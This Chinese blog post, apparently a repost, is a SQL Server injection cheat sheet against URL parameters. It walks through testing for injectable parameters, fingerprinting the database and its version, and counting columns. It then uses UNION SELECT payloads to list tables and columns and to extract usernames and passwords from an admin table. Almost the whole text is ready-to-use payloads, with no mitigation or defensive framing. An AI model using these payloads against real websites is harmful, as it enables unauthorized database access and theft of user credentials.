sql server 注入

2019年6月9日 227次阅读 来源: linkally

1判断网站是否是注入点

①  :包含?*=变量名的 URL  

 Integer:                        

www.target.com/1.php?id=88            正常 www.target.com/1.php?id=88-0            同上 www.target.com/1.php?id=88-1            异常    

 String: 

www.target.com/1.php?id=88  ‘And ‘a’=’a                  正常 www.target.com/1.php?id=88  ‘And ‘a’=’b                  异常    String 

www.target.com/1.php?id=88              正常 www.target.com/1.php?id=88’%2b’            同上 www.target.com/1.php?id=88’%2b’s            异常

2判断数据库是那种类型

数据库判断

MySQL

/*!%20s*/        错误则是MySQL

/*!40000%20s*/ 错误则版本大于4.0      (大于4.0支持UNION注入)

/*!60000%20s*/ 正常则版本小于6.0

/*!50130%20s*/ 错误则版本是5.1.30

/*pc*/    //正常为MySQL

支持–pc,不支持;      //Oracle

and exists(select @@version)– //正常为SQL Server

判断字段数

显示数据库信息字段数查找

id=1/**/Order/**/By/**/5/**/–         正常则字段数≥5

id=1/**/Order/**/By/**/6/**/–         错误则字段数<6

判断字段数据类型

id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL–

id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL–

正常说明第3字段为字符型可以显示SQL注入数据。

显示数据库版本

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL–

当前库名

and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects–

指定库表名

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from库名..sysobjects where xtype=’u’ and name not in(select top 0 name from 库名..sysobjects where xtype=’u’)),NULL,NULL,NULL from sysobjects–

当前库查询表名

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype=’u’ and name not in(select top 0 name from sysobjects where xtype=’u’)),NULL,NULL,NULL from sysobjects–

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype=’u’ and name not in(select top 1 name from sysobjects where xtype=’u’)),NULL,NULL,NULL from sysobjects–

字段名

从0开始增加第二个top N的数字就可以遍历admin表的字段名了

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–

字段值

id=1 and 1=2 union all select id,username,password,NULL,NULL from admin–

    原文作者:linkally
    原文地址: https://www.jianshu.com/p/c1e269b6d746
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞